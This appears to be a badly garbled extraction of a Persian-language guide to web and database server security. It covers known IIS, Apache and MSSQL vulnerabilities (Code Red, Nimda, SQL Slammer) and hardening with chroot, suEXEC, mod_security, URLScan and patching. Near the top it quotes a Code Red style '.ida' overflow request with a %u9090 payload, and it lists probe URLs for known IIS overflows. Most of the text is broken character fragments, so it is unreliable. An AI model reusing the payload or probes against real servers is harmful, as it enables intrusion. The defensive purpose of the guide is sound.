< B
3,
<) " N
ISAPI DLL
TP $,<
-,
6)
,
"
pqqp
-,< - 1
@‘
‘
6)
GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0
U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7
0,
E - 1
@
\X
%SYSTEM%\NOTWORM
2 -, 6 ?
- 1
@ CODE RED (
2 `560, <
,4
u( 2
,<
7# 2
N4
@V#
3
<
0, 6,
9
2 -, 6 ? $
-
+ H) P
[ 6% ' 5I 7
0, <
; +!0x90 0x90 %u9090 # :
,<
% ' ROOT.EXE % ' >/
- 1
@
6% '2 `56),
560,
>/ TQ ? !
X /T /
"), ) % < 7
NIMDA(
,<
)
% ' ,G 2 `56NIMDA)CODE RED
6
-
./0
(
7
,
)
H?
,
"
,
8
+
5 5<
,
+1 2 " 34 5
6
nop " @A x86 =
U4
4
78
> ?
8
6-
"( 7
<
-source code
#' , <
,
:B
g e '2 0
N
,
6U
a
"
SQL 7
,
‚, <
"
5 5 <+
% 5< 6:3 2
B)
-
-N4
'%#
IIS
6, ?,
5! "
^P
1#< 2
4
.INC
@?
0
!89$% 5 h @ ,
T5!
,<
6,
(
?
4
)
j 4
I 7
R4 S @ ?
2
" %P
H U 40 , < - @ ,
R4 S @ ) , <
-
85/ 2
& 7 5B…
INCLUDE
B'" - Y …
#
.
#
)
?)
0,
0
6 3 ;. %LY
<) 2
9
"
R4 S @ ^
@ +'
F
6N 4
,
)-
,4
N -
#
3
,G ;/P
HTTP GET
R4 S @
OK(/DEFAULT.ASP
/DEFAULT.ASP+.HTR
+.HTR SOURCE DISCLOSURE
ERROR
PERFORMING
MS01-004
/FILE.STM,.SHTM,.SHTM1
WEB
QUERY
500
j 4
2 ? N
SOURCE MUST BE PRESENT
500
# , <
R4 S @ v 4
j 4% H
200
I'.
3$, 6 ( E 5< B
!
( ,H
-
3 #P< I 7
?@ " ?5F
?
7 .X …
?5 3
,
"
#
7 L
u2 & N
Y* 7 !89
6 <…
< ASP
00 ) & 7 5B$
,
S#
2<) ) iX ) ?
GLOBAL.ASA % ' 2<) ) .ASP,
`@
H U ˆ6,
>G ,
0, <
)
d*
INTERNAL
ERROR;HTML
ERROR IN WEB
SERVER
DIRECTORY
PATH
DISCLOSURE ,Q193689
/NULL .PRINTER
.PRINTER
CONTAINS
BUFFER
OVERFLOW ,MS01-023
PRINTER
INSTALL
200
OK;HTML
CONTAINS
/NULL.IDA,IDP
INDEX
SERVER
BUFFER
THE IDQ FILE..COULD NOT
OVERFLOW,MS01-033
BE FOUNS
200
OK;HTML
THE
CONTAINS
FORMAT
/NULL.HTW
WEBHITS
OF
SOURCE
DISCLOSURE>MS00-006
QUERY_STRING IS INVALID
200 OK (/FILE .STM MUST BE
/FILE.STM ,.SHTM,.SHTM1
SERVER
PRESENT)
501 NOT IMPLEMENTED
SIDE
INCLUDES
BUFFER OVERFLOW
/_VTI_BIN/_VTI_AUT/FP30REG.DLL
FRONTPAGE
SERVER
EXTENSION
BUFFER
OVERFLOW,MS01-035
a+
1-HACKING
EXPOSED
–WEB
APPLICATION
,JOEN
SCAMBRAY,MIKE SHEMA
2-WEB
HACKING
–ATTACKS
DEFENSE,STUART
MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH
3-WWW.SRCO.IR
a ,
, < +H ) B
5/
6
ˆ60, -,< F
2
)
') G O)
R4 S @ " 5<
(E
)
6 )
?@ n 9 "
@ )
6
2#5
N
,<
" 7, ,
5 $,< 62 ) #.
)
2
2 `560 <
& 21
)
, LH E
)
6)
B3
0 )
$
6$ O)
()
R4 S @ )
< ;. NETSCAPE) IIS)APACHE? `56
R4 S @ -, 4 2 ,
N N %B
. ) DOS1 785/
6
) 'G U
)
6,
H
@ 15G )
5!
0 "
0
785/
1
,
N
–denial of service
B3 X / T /
,
G1:
$, < , Y -8
j * 2 5<
56 ‚, <
,< 6
N,
)
') )
-
)M
6 #< TP
BPH "
3
,
B3
,
/
? ) "
# TH
APACHE
0
)
5
O) ? , 6 U )
78#
4 $_IIS]
) %K
0
CA-2002-17,CA-2002-]
=GX
-
0
6 ' " 7, ,
-
R4 S @
? `56) <
R4 S @ ^
bP
!
)
h / 6-
_
?@
l '? #
4@0, <
-)8!0
4@ -, 6 U )
- Y "), )
I =B*
R4 S @ ^
B!
? 5 TG' g•
,
] -, 6 U
•
4@
6*
? '- 9*
H U#
1) U#
N
&
)j 5•
•
#
"
R4
) - " -, 6 U )
4@ Z F
PL $ U
6
) 6% '2 3 , - 9*
3)
-)8!
6 „ 1 # $_27
_DOS] U )
e 'j 4 7
F)
& O) -, 6 U )
"$ ?@
6*
&
)
6
"
5
" ,G )
?
4@$
" \ 2 0 5 SL & , 5
0,<
7
3 O) 7 .Y
-
H
,
)
H8! h
?8'
6
,
<R 2
3 F S1H ) ,
9
,
?@
APACHE
1
)„
,<
- *1
"
APACHE
1
)„ 2 56)
Pc
3W 3
e ' ) #17 E
E
3
- *1
ORF 3
.Y ?8' ) , -,6
4@
O) -, 6 U )
& PHP)CGI
R4 S @ ^
F) 7
a
') #
3W 3
# _APACHE]
"
4@ , ) 6T)„
3W 3
S @^
2 1
),
T25&
,
! X
I 2
) 7 .Y
0,
,
3 ,
-,6
7 .Y j 5 ) / 9
y
,
, 6, -" F , P 4 \ X
2
#
0 ,6
H :3 e G
0
)
6
5 ) TQ
c 9 6SLASH B )
) MOD_DIR,MOD_NEGOTIATE
1
)„ ?
"
?
1
6URL 5F
c 9
MOD_AUTOINDEX
? 56
. APACHE
R4 S @ 2 0 ,6 j 5
2001 h
APACHE 1.3.19 *
A8 ) 8
1P
5
1)
B "
URL
0
B3 j
Y0
"
B "
,4 P
B
g O) )
- 4
GH ) , G0, 6 j 5
?@ B )
#
5 APACHE 6 )
,
2
0,
A"
1
2<
?
< Y,
E
#0
& URL
:&i2L + $0@
, #4 B)
%#
1
)„ 0
) e
'j
)$,
.
'
H )
,
APACHE
'&
F)
2 %/
(,
6
)
APACHE #
) $,< , 4
B1 ˆ 60
-, @
"
H APACHE )
1
)„ 2 0,
MR /
# 0,6j 5
0
B
2
MOD_DIR)MOD_AUTOINDEX
47
1,
,
Q
0,< +' APACHE 1.3.19
2
<+
2#5
1) ,<
8000 "
4
?
? ! $
B
B3 PERL
B
5/ 2 -
"
? 5$
/CGI-BIN///////////////////////////////////////////////////S
7) Y
;!
MARTIN KREAMER
- '4j 4)-
" ,G
<
93
@ APACHE ?
%
, 6, j 5
? "
3 O) )
,
- Y ,
1
)„
N MR/ ) 1
[ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX
APACHE
2
,
60
#
', 6 3 B
H" 6
Y
0,
Y1* $ ,
? ?
)
B)
-
"
1Q
2
P10
3
<8 6
6 BH 2 , ,F
,<
1
2001 c F
n 9
, $
APACHE
0
1 " ,<
6 3 P
.
,Y
(5
[ \X
1 ,6 *
-,< e !
'?
B
,
1NETCAT
6
PASSWORD % '? 56c /
"
)
F
3
B
5/ 2 0,< A & BUGTRAQ
0, <
-, @
# 2
O)
,
" KEVINb
,
a,6 j 5
B
APACHE)MULTIVIEWS
R4 S @
)
) X
,4
BRASSCONNON.NET
"
,<
4
, -" F ?), APACHE0
$ )
"
MOD-DIRT)„ MR /
2
F) 3 P
1
,<
6)
6
\ 2
B'
R4 S @ 2 0,<
0,6
MULTIVIEW
'
?
B -
, P
-
) X
g
B'0,
- N`6
, P$, <
V4
?)
2 O) ? , 6 G
5
#
"
H) 6
2 \' 21
)
0 < - 3•
B' 6)$
?
1
0,<
?P 4 * $ 5 ,H
R 4 S @0,<
<
F)
@ ?)
6
% H
6
)
B)
,
,,
h / 6-
MOD_AUTH_*SQL j P(
<) STUTTGART- N
?)
_¤]
7
,
2
P
10, <
0
iX
SQL
-" F ?
" RUS-CERT,2001
1
)„
4
2 56)
<
6" / ?@ 2
0
-
6 3 ;. %LY
@
6" / N N
R N F O)
,
"
9
-, @
3
\X
MOD_AUTH_*SQL
• ("c
P
10,
")
0,
,
APACHE ,
R4 S @ d *
- . W L3
a
- Y
! ". /0(123&
("c 7 !89 S
)
6h @ " ?
$
"
6 @
I5
4@ O) -, 6
APACHE 1.3.X
h @" ?
1
2 " U4
+$
U)
@
MOD_AUTH_*SQL
- Y
", - - )
SQL
P<
•
:
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13
h @" ?
APACHE 2.0.X
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20
)
R4 S @ d *
" - Y
0,
<P
0
,Y
- .
I 5 ("c
'7 !89
G X) Z
W
K
a
6h @
("c 7
4
& HTTP://HTTPD.APACHE.ORG/a h @
"2
APACHE O) -, 6 U )
0
L3
$-,< - <
"7
K
4$
"7
"
4@ O) -, 6 U )
4$
DY/ B
<)
DY/ I 5
4@ O) 2 3@ SL " ? 59…w
HTTP://HTTPD.APACHE.ORG/h @ " ?
5 - Y levels PATCH) 6 *
h @" ?
4@
:
GX) 2 3@ "
2
6@
Q CODE SOURCE
6*
…
I5
I
…
0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/
? @ " +F ? !
.
I
4@
% !
) X
- <
R4 S @ ^
1
)„ C'
# 2
"
$
.
-
"2
% 5
0, 5
6-"
$ -, 6 U )
O F$
4
0
? G
“/“
- Y
G',
% '
5 -,6
6
c
H,
), . $ l '
(
:
?@
), .
-)8!0
0, @
#
0 5
?@
'#
,6 *
6U )
H CHROOT/HTTPD|
0
LOGIN SESSION
"
5 )
?# $, 5 " g@
3
6- Y Z
6- Y
#
6 '
) -, < -,
F
W L3
$l '
3
6j*
G',
c
2#5 $
) -,< -, 3 'SHELL
",
8Q0,
C
L
3 'SHELL
15 / - Y Z
E /CHROOT
1G') Z F CHROOTED 7
S
2#5 $
$
,
6
F W L3
4@
F) CHROOT " z 3 ) % !
15 /
F
3
<
4@ -, 6 U )
F CHROOT b .
8Q0
C
)
F & 7
I
)
G ; ! CHROOT
CHROOT0
5<
l '-)
B 4$ CHROOT…‹
,E =
,4
2
W 3 ^ P>
F
) ROOT
? G,
F " …s
E " E %H ,/ W 3 6)
- ),. ,E = G ;!
)
#B
5!
4@
0 < ,6 *
/ 0
- Y
- 5 - Y _CA-2002-23] OPENSSL
) ,
) X
4@
2
5 MOD_SSL(CA-2002-27) (
%
I 2,
F
("c :
("c0,
0
)
!PATCHING " ? 59…p
,B
F
S
4@
2, 0 < ,6 *
5 ? G0
5 ? G0
H CHROOT
E
E
15 /
/BIN/SKY
4@ CHROOTING
)
!89
, "
?@
I5
<&
$ CGI,PHP
6
6U)
,G
+P
-
^ P
6 A) 0,<
< TP,
&'(
7,
3
?@
#
P )
"E
6 ,'
1G'\
6%
6
•c
4) 6
S
, ?# $ S
!89
,
)
BH$
@
R3
4@ -, 6 U )
0
'#< ) [
6 '$ -, 6 U )
< $
, 5
'
K LOGGING
0, 5
(E
2, 0 <
I 5 …Š
) -, 6 U )
("c 2
40
6% '
+
K W L3
?#
" W 3 I
) 1
)„
F) CHROOTING
<
B
K
LOGGING 7 B
5!
g
*
("c 7 , 5 ? @ &1
R 4 M :G
H
9P
("c$ O) -, 6 U )
2#5
F %K W L3
I
6 #6
-, 6 U )
W L3
c
("c
P F7 [ ,
b.
F 3
- Y $ 9
1G'W L3
("c 0, 5
B
:
I 5 O) -, 6 U )
? G$ I
)
# 2
:
6% '
7 L
g
'
)
F 7 !89
a,< ,6 3 6 '? @
a 5 - Y
"+
" ,
•c 7) Y
h @ " APACHE
6
'
)
<@
I5
1.3.X
…
< HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML
APACHE
HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X
- Y
0 <
•c
P
) F
6% '
.
2#5 -, @ j 4 ^ <
) CGI,PHP "
6 „ 1#
&1@ ? j &' I 5 ?
•c0 5 POST,GET
^
MOD_SECURITY n 9 " ,
6•c
F
#
)
)
)Y
l ' GX)0,<P '
,, $
- Y
#
P
[ ( ,H $
=GX
" - Y Z
POST ) GET
bP
7 B
5! ? 5
0
R4 7
_DETECTIOMN INTRUDER] 2 5/& d *
l'
0, 5
N 4
K
F
O)
S
W L3
j< 4
" $MODSECURITY0, 5
U)
MODSECURITY
)
("c
6
<
6 'O)
N 4 ) ,<
O) -, 6 U )
6
^P
- 56
F
0, 5
5/
"
4@ -, 6
-HTTP://WWW.MODSECURITY.ORG/
•-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12
6
) SSI,CGI,PHP…•
#
a
,F
) X #
N ], K5 TG' g
4
#
I
,!
T G' g
2
<
F) ? @
:
SERVER SIDE INCLUDES
",
3
:
) SSI,CGI,PHP…
6? "
_,<
Z
"
6,
F ;! ) ,
6 '-, 6 U )
SSI…
" - Y
0, K5
) SSI,CGI,PHP "
#
6? "
#
F ? # $SUEXEC0 < - Y SUEXEC "
6 ' APACHE USER ID
H
^
, 5
6 '
USER ID
, 6 3 MR /$ ? 5F
7
7, , S
b
, < ("c j
SETUPID ROOT
,
4@ .
. CGI)SSI
L 3 CGI)SSI
) 6 @
3 <) S
SUEXEC " - Y )
/ 0, 5
6
F
3 '
6
F)
, # 4 (,!
#B
5! - .
)
6- Y/ ")
<@
- Y
;!
I ) :
a 5 - Y
a <
- Y
6
SUEXEC " -,Y 0, <
(
0,< ,6 3 N
h @" ?
- Y
2 , 0, < O ) -, 6 U )
-, < <
P
- 5
?# 2 SUEXEC
4@ ?
…
$
USER ID
%
P 7) Y USER ID
2 < ? # ) j6
) X #
" h @ " APACHE 1.3.X
3
2
"
6
…
HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML
a <
" h @ " APACHE 2.0.X
- Y
…
HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML
) CGI-BIN
% <
,
MR/$
5 e 'j 4
6
. W L3
#
5
("c
…
("c ) ( E 6
#
PHP "
) -
z 3 1 2
B / " S1:
a
0
HTTP HEADER
F
- < W L3 2
7 !89 K ;!
SAFE 1/
h @ " ?
W
l '\ X
L3 2
23
5 )
K6
PHP
25
4
C
'
4 ? 5 TG' g…
F " ? 59 T L/…
B5# 7
!89
'
HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706
T)„
8Q 0
G X)
XSS:CROSS SITE
" ?
W L3 2
P
%
I
'X
)
…
MOD_SECURITY
DY/ ; ! ,
B5# 7 !89 -,6
1
)„ " - Y
0 < SCRIPTING
<@
0 5 - Y HTTP://MODSECURITY.ORG/ h @
SQL INJECTION &XSS % < R 4 S @ ^
( 0 5 - Y
h @
2 P
h
,G
6
6 & " ?
:
) &5 …
0
56 &K/ &
H]NIKTO &
%
"
2
#
'
# _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML
0
CGI
) j 4
6&
R
Y
9f
!"
1
23 4 0
&'(
7 !89 "
0
25
?#
A
5L M 9
N M 9" ) , < % !
) !
$ @)
F 7, ,
6
&1@ )
(E $ F
: ),
6
-
% !
"
/)
56% !
-")
) 'D
? ,
, - .
6;. " -
56 $
) 5B
!C
8
%K
&' * +
:
-,< =! > ?@
J
)
# $% !
GH )
5 2'
O*
! 5E 2 '
I
I
H? "
?@
P 4)
,N
0
,G
R4 S @
3W 3 P
B
9
2
F) % 1 $
' ?5F
' 785/
0
T) , % !
) - 5 - Y $-,< 3 <
, * $ 3 M, 6
" 6
%
(
$O * 7
2 5
"
^
L )
?5F
6 @ 0, 5
" - Y
H7
E )
F 78#
2 5
=GX
F) B
! $ R4 S @ ^
R4 S @ d *
? &560
"
6&
$? 5F
) 6- Y/]
Code Red )
$7 !89
:
6A) "
$\
R N6 2
$% !
3
0,
F %K
? @ > GP
8 $
Ba I K6
6
?
" V,
I 5 ,G
* $M,6? G
) X
)? "
R4 S @ ^
K
0, 5
#P
<
"), )
- .)
& 5
Q
6U )
) [
3 _ R4 S @ ^
N &1@ ) K < 0
c
-
) 6? "
N` 6?), ) - # M 9
6
=GX - Y Z
I
,
) 6(
R4 S @ ^
<
b
R4S @
I 5 -, < 2 ),
5B
! 7,
0, <
S
0,< ,6 3 K
c
! 5E
6 'G " U4 $
2
0 3
% !
6
$
N 4
) B
6A) $, , e G
$ R4 S @ ^
"
6%
DY/
4 63
R4 S @ ^
2 5
$_ 1 f 4] "), )
0 3
R4 S @ ^
F) " [
&1 @ ) K < 0 )@
h <
6 A"
? "
,
)
"
? ,
0
=GX
-
"
)
6 S
"
6
! 5E
1) U#
- <
F
4 ) A8 % L/ $% !
7c
9 $U
785/ ) 7 , , SB
g $,
- <?@
R4 S @ ^
,F 7c
6 '? 5F
#P< )
0
4 63
bP
56
% !
6
? F i:
R4 S @ ^
-, " )
0, 6 ( E
("c 7 ,H ) <@ ? @
% !
6
F
-
K6
F
-)
-")
-
F
0, 5
"), )
-
3
I 5 ("c
6%5G1
% <)
bP
B5# ) , Y 7 !89
K6
? F
25F
b
f
% !
6
, G 785/ ?
- Y % !
R4 S @ ^
!
R4 S @ ^
! "#
i:
6
? G _7) Y
2 5
?
"
0
4
1
$
# "), )
- Y
G )
6 * ] "), ) "
$-,< ( E -
)\
a 5
• Internet Information Serveces (IIS)
• Microsoft SQL Server (MSSQL)
• Windows Authentication
• Internet Explorer (IE)
• Windows Remote Access Services
• Microft Data Access Componenets (MDAC)
• Windows Scripting Host (WSH)
• Microsoft Outlook Outlook Express
• Windows Peer to peer File Sharing (P2P)
• Simple Nerwork Management Protocol (SNMP)
785/
-,5!
] MSSQL ) IIS
6 3 $_) )
$ 1 2 T) j *
0 3
4
! " % &# '
Internet Information Services (IIS)
3
IIS
R 4 S @ $e 'j 4 , # 4 ) 7 5 I
a, 5 6 '
" 7, ,
",
) -,
_
3]
G
0, 5
I K6-, "
4 j 4 0, 5
N ISAPI
7 B
5! ( E
- Y $O)
Y 6ISAPI
6 B'" $IIS 0, 5
,F ) W 3 7 B
5! (&B $ISAPI
_SL ]
IIS SL ? "
)
Code Red, Code red 0, <
P 4
F
- Y 0, <
- Y
V < ) Server Side (SSI) Includes $Server
Pk
) - PSL
3 M ,6
4 " IIS
K6% '^ P ) N P56 I 5 _ <
bP
0,
23 , - 9*5 •
%
K6% '] ISAPI -,< 3 < %
ISAPI " PHP ) Coldfusion
Active
ZF•
37
-, 6 U )
W 3
,G
) 6% '23 , - 9*5 ) j 5 •
h / 6-
DLL O G
7P
[
? 5 TG' g •
_DOS] b)
6 B'? @
SL
? 5F
l '=GX "
b
" ,G
) e 'j 4 7 L C
85!
- Y Z
,<
6 B'"
O *
% H $l ' 6 B' Q
6
"
K6
5
0, - 5 - Y
5
l ' 6
/ 9
H F
,1 )
" ) -,6
,
6
P! &
I & IIS
% < $O) ? , 6 U )
0, -, < / 9 $O) -, 6 U )
B
5! b .
? # IIS - 5
< K
I h / 7 !89
7P
[
I5
%K ? 5 m.1 ? @
#B
5!
6
K
5 "
) - "
3
0
) - *1
0, 5
6'
'N
6% '
N " $ 1
) SL " U 4 IIS S
ntdll. Dll Web
R4 S @ ^
) 6 ' _U )
? 5 T G' g] Dos \
U)
)
8Q 0 )@
C
3 I
H ? 5F
$ F
6 ) nH
6
3 ], <
6 ' ? 5F
F
"
" 785/ ? # IIS5.0
#
R4 S @ ^
, N ) ( N (, !
F) E
F
H
?5F
) N
-, 6 U )
)
DAV
0,
-, 6
3 - *1 7
F
0_URL
SL IIS )
7 ) X
, ,F R 4 S @ ^
=GX
o
F)
F
")
) i.
)
K6%
, # 4 (,! % 1
, ,
& IIS
], 5
4)7 #
& PHP, Coldfusion
",
$ R4 S @ ^
,<
0_ N T L.
-, < SL T L.
T L.
T#< )
"
6=GX ) 78#
- Y IIS 5.1 *
0, 5
- Y IIS 6.0 "
pqqs "), ) )
G:H 785/ %
IIS
K
,
# )
-,
7,
) ' ) #
I5 ?
:
0 5 - Y
2 ) % <
' ) #
2
< IIS
1t
#
S L ?@ )
#P< )
^
? , 0
3
0, 5 ( N IIS S
" IIS
0, 5
! ". /0(123&
6 & 2 , ,F
&
:
K A & ?
L IIS
R 4 S @ $, < -,
, N $S L
XP"), ) •
l ' R4 S @ :
) e 'j 4 7
l '
pqqq "), ) •
Professional *
"
+
) SL
NT 4.0 "), ) •
-, 6 U )
0
6Patch
+,
- Y IIS 4.0 "
- Y q$r IIS "
0, 5
I ] 0,
N 0, 5 6 '
- $() *
0, 5
6h @
,
bP
Baseline Securiy Microsoft Analvzer
,6 3
$,
-, !
:
-,<
7,
0
4
GX)
I 5 ?@ " ) '
,G
!89 +
K
3j
$
F
-,< -
IIS
GX)
("c
') #
#B
5!
0
bP ) S
b
R4 S @ ^
. " $ 'S
+H ) , Y
Cheklists a I -,< K
,
"2
<" @ 7 ,
6, @ '? 5 TP
,
" - Y
$ B
/
, ,F =GX ^
=< 7" 5 0
Auto Update , windows Update 0
0
6Patch 2 3@
-,< K
,6 *
6Patch
6
h @" ?
'
IIS "
) - "
l
6? ,
X !
) - @ T L. 6
Update ? #
_ ' ) #
1
)
) X
^
Patch "
I5 S
K6 &
) B
.
)j 4
("c 5
- Y % H l ' & 0, 5
' &
*
I
2
3@ 0,
-,< K Patch 2 3@
)
b
6
K
XP
<
" #
- Y IIS - 56 PHP
("c 0
5 SL
IIS
-, < 'X
6
:
Patch % < $ ' ) #
' ) #
(N
K
http://www.microsft.com/technet/security/tools.hfnetchk.asp
) Perliis, CouldDusion
"
'
!
"), ) ) pqqq "), ) NT 4.0 "), ) )
0
6Patch
Checker Network Security Hotfix (HFNetchk)
? ,
F
456 123&
5 ( N $-, < K
- Y
F
# O B
:
-18 9 Patch # 7"! &
1
)
Patching 0
-, < S L -, 6 U )
)
) ( N6
K6A) "
! " %&
IIS
DY/ 6
$ #P< ? , 0, @ %5G - Y IIS
" - Y
i: Z
IIS
,<
-, < ( E
-,< K
6
<
"
(N
P ) GF
l '7c L.
6
F
6U )
) Windows
-, < 'X 7c L.
g] -,< 'X 7c L.
"
( N6
bP
? ,
0, 6 ( E
- (#=% ! & 2>
Lockdown IIS :; < &
? @
) ("c
6
("c ) - P
3
15
IIS
IIS
&)
IIS SL
K
h @" ?
0 5
F
25
I
*
0
-
&
<
') #
Lockdown
-,
. com/technet/security/tools/locktool.asphttp://www.microsoft
'
3 I
SL
"
7
:
Expert
u?
"7
u?# S
) Custom 1/
l'
F
IIS SL
2, 0 5 d *
^P
6 'IIS
a
?@
F)
5< I
N ] WebDAV ? 5 TG' g •
b. #
_,<
Printer, ism. a I ]
) X
g
< "
$O)
.
6ISAPI extensions ? 5 TG' g •
_Idq, htr
IIS - 56 -,< K
b
C 5!
T) ,
5
7
-
3 ) Code Blue
HTTP
0, <
6, "
?
URLScan
? @ A"
4 " % PH K6
) cmd.exe
27 ? 2 & @ 2>
I IIS
R4 S @ ^
6
3
I]
1
) K LLS Lockdown.
.
15
bP 785/ "
7 L
*
2 ` A R4 (,! ;!
&) - 5 l '
"
,G
6, " Code Red
85/] , 5
5
- Y
, #4
0, < -, 6 U )
http://www.microsoft ah @ "
0
- Y ?5F
URLSean
B'0_Buffer Ovrflow \ "
3
+ •
Z&F " O) -, 6 U )
0_tftp.
-HTTP + ,
5 MR/ •
6
N
b
?@ ?
' & com/technet/security/tools/locktool.asp
R4 S @ : 2 )
Microsoft SQL Server (MSSQL)
_MSSQL] ' ) #
, F R 4 S @ : 2,
- 9 *5 )
!89
3
0, 5
7
.
6 ' ? 5F
2#5 & -, 6 U )
3 M, 6
F
/ 7 !89
i.
R4 S @ ^
-, < =
'
?#
SQL ? , 6 U )
b
? &
MSSQL
( 5! W 3 F
- Y
u $h
SQL -, 6 U )
,
7 / 23 ,
# 4 (, ! % 1
, )W 3
0,
HS @), , e
6=GX "
!
?@)-
G
?5F
SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida (
) 0, 5
) - Y MSSQL -, < 3 < =GX ^
3 ?1
( E l ' R4 S @ :
2'
,
F
F E F)
Tu<] ,
6(
:
-
" _pqqs ) pqqp T ]
-
785/ 6
1
@A
I
0_T
"
-,< TG'] SQLSnade/ Spida (
b. ,
6h @ ) +
:
,
- 1
@ ? & 0, 6
#P
< ' $ R4 S @
'
a 5 - Y
aMay 2002]
l ' 6(
j &' Kc ,/
B5# 7 !89
? " 7,
6
4"
" ?
K
c
$l '
B5# 7 !89
•
http: //isc. Incidents. Org/ ang lysis. Html? Id= 157
•
http: //www.eeye. com/ html/ Research/ Advisories/
AL20020522. Html.
•
http: //www.cert. org/ incident- notes/IN-2002-04. Html.
T G'] SQL-Slammer/SQL-Hell/Sapphire (
:
B5# 7 !89
aJanuary 2003 v
•
http: //isc. Incidents. Org/ analysis. Html? =157
•
http: //www.nextgenss. com/ advisories/ mssql-udp. Txt
•
http:
//www.eeye.
AL20030125. Html
com/
html/
Research/flash/
-,<
•
http: //www.cert. org/advisories/ CA-2003-04. Html
) wxss
4 Internet Storm Center b
67
K67 4 B
5F " _MSSQL -, 6 U )
,<
0
, #4
" ? 59 T L/
0,
2
0
I5
F
DY/
,
( , H ? @ ? 5 T G' g
sa Account
" ?
6
"
) h, /
-
P
6) ( E
:
" %#
T
0, 5
"
#
6
2<
)
U)
) 6
$l '(
%
N 4$
gatway
\ ' A) 2
#
N
7
UDP
^
0_-,< - < 7 4
'
L
/] , < %#
H
wxsx 7
bP
#4
4y
!89
F
3
H, , e G
)
I
Z F MSDE ? @
)
\X
!89
? ,6
Patching
6j 4 7 L
z) 3 ) ) ) -" F]
_ SQL -, 6 U )
6
F SQL
bP
MSDE 2000, Microsoft Server 2000 Deskrop Engine
,G 0 '
!89
1
@),, e G
("c 7 ,H 5
B')
6
#B
5!
5
l ' GH ) h
0 ' ,6 3
,
-, < K 7 ,
3& @,,
0
[
I5
) -,< N
wxsx 7 4
5 0, 5
'
Resolution Service
Overflow Stack Buffer \ 2
), <
?
SQL Slammer (
2
6
&
3 account
?@ "
h
"?&
R4 S @ ,L
K6U )
I
SF l 'Buffer Overflow 0
( ,H (
" :
Sa Account 0 5
P
!&
Buffer Overflow
_% 5/] A
bP
B5# 7 !89
- . _0 < 5 - Y SQL/MSDE Z F
SQL Server
..
0 < 5 - Y
I
-, ` 4
P
!&
account
^
K7 L
#B
5! - .
Null
_,<
- Y Chang the SQL Sevr Admininistror Login h @
?@ d *
b
SQLSnake (
N
, )
67 4] wxsx
25F
, account
("c :
" #
e 'j 4
H _ '#< - N]
sa account] e 'j 4
0
-, < K A & h
#P
< 6
#B
5!
"] SQL Lite Server ? G ?
2
P
/
?P
/
"
"
-, < S L Server SQL " *
) 6 @, <
)
7c L. - 56
Z&F "
? @)
# ? G MSDE 2000 0, ,
P
a
•
*<
SL
"
SQL/ MSDE Server 2000 (Developer, Sradard and
Enterprise Editions)
•
Visral
Studio.
NET
(Architect,
Developer
and
professional Editions)
•
ASP. NET Web Matrix Tool
•
Office XP
•
Access 2002
•
Visral Fox Pro 7.0/8.0
0, 5
,
-Y
, 6 3 SQL/MSDE -, 6 U )
#40
= B*
6A) " - Y
8Q 0 < C
A
" - Y
$? ,
H? ,
_TCP 7
0_
F) & -, < - <
wxsx 7
wxss 7
4
/ 9 -,
-
0,
TL
4
$pqqq MSDE
F
UDP
&1 # ?),
#
Overflow Buffer
^
4
U)
60
? ,
d*
")
GX) $, < , 6 3 ( E UDP h
6
;! $,<
)-
%L
?@
UDP
U)
^
0
$-, 6 U )
-, <
? ,
X02
0,
<
"
* A) " I '
,6 3A
wxsx 7 4 )
!89
K6
$
( 4
#4
NAMED PIPES
)
l '7 4 0
3
l ' ,
6" - Y ? # ] ,
? !
l '7
6
L ?
? ,
#) )
TL - . T
!89 $
( E
4" - Y
pqqqMSDE
!89
56MSDE ) SQL -, 6 U )
y 6567
#
b
& ?@
N?
4] Session NetBIOS
4 xxr|ws{ 7
^
,K
U)
#
R4 S @ ^
( E
U)
TCP
U)
6? G MSDE " l ' 6 &'(
!89
!89
3
:
F) -, 6 U )
\ 2 " 785/ 6, "
#
?@
F
pqqqMSDE
'
6-"
Z F System Local
,L
account
^
,
4 # " I ' ] 0,< ,6 3
) User Domain
$ F
6- Y/ " & @
0,6
,L
Overflow Buffer
)
- Y ,L
, , j6
F
("c 5 $
nH
Critical Update a I ! '
R4 S @
7 K
&F &1 @ ) K <@
' - Y _,
H , , ) - 9* e G
6& " - Y ) '
0 5 ( N6
[
0 5 - Y Incidents.org h @ " ?
- Y $, 5
? @-
6% '7
"), )
Microfoft SQL /MSDE Desktop Engine
"
,F 7
0,< ,6 3
N
:
)
8 (
6& "
h @n
^
+,
6*
"
6
6) , < -, < SL 2000
&'(
HS @),, 2 e G
2
l'
) pqqq SQL/MSDE Server7.0
$, 5
+
K
K
Kit Microsoft SQL
$ SQL/MSDE
56
- Y
- Y $, 5
0, 5
- $() *
SQL/MSDE Server,
F
, # 4 ) Patching " 5
% < 6 #P
< ) Domain ( 5 ?
6
^
" SQL Slammer #
, # 4 ) Patching " 5
nH
3) l ' F
! 5E
- Y MSDE 2000
! ". /0(123&
') #
<
9" ?
http://www.microsoft.com/sql/downloads/securitytools.asp
? @
SQL Critical Update Kit $-,< K Toolkit 0 5 , 4
6 & % < ) -,< -,
& SqlSecurity.com
0
SQL Critical Update ) SQL Scan
!89
-
K
5
$, 6
$l ' & 0
)? &
A
^
UDP1434 7 4
wxsx 7
SQL Pingv2.2 (
4
_X02
SQL ? , 6 U )
& :
2
UDP
, ]
0, 5
I
T
Subnet
) *
- 5< I
SQL Scan Microsoft
0
^P
!89 ) -
l ' &'(
#B
5! 0, 5
TP
("c v 4 ?@
